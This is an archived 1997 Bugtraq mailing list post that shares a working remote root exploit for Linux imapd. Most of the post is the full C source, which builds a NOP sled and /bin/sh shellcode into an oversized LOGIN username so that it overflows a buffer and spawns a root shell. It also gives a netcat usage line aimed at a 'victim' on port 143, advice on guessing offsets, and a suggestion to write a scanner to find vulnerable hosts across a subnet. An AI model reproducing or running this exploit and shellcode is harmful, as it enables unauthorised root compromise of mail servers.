Bugtraq mailing list archives
imapd goodies, one that works.
From: so1o () INSECURITY ORG (so1o)
Date: Thu, 7 Aug 1997 19:35:34 +0100
Hi, Here's the rootshell spawning imapd remote exploit, you don't get a prompt, just hit "ls" or whatever when you connect to port 143 using this exploit, you need netcat and a bit of luck, ignore any warnings on compilation... /* * IMAPd Linux/intel remote xploit by savage () apostols org 1997-April-05 * * Workz fine against RedHat and imapd distributed with pine * * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the rest of ToXyn !!! * * usage: * $ (imap 0; cat) | nc victim 143 * | * +--> usually from -1000 to 1000 ( try in steps of 100 ) * * [ I try 0, 100 and 200 - so1o ] */ #include <stdio.h> char shell[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88" "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e" "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xe8\xc0\xff\xff\xff/bin/sh"; char username[1024+255]; void main(int argc, char *argv[]) { int i,a; long val; if(argc>1) a=atoi(argv[1]); else a=0; strcpy(username,shell); for(i=strlen(username);i<sizeof(username);i++) username[i]=0x90; /* NOP */ val = 0xbffff501 + a; for(i=1024;i<strlen(username)-4;i+=4) { username[i+0] = val & 0x000000ff; username[i+1] = (val & 0x0000ff00) >> 8; username[i+2] = (val & 0x00ff0000) >> 16; username[i+3] = (val & 0xff000000) >> 24; } username[ sizeof(username)-1 ] = 0; printf("%d LOGIN \"%s\" pass\n", sizeof(shell), username); } If you have half a brain, then it doesn't take 2 mins to throw together a quick subnet imapd vulnerability scanner, so have fun. Fin. .so1o The CodeZero Ninja Task Force. http://www.hacked.net
Current thread:
- imapd goodies, one that works. so1o (Aug 07)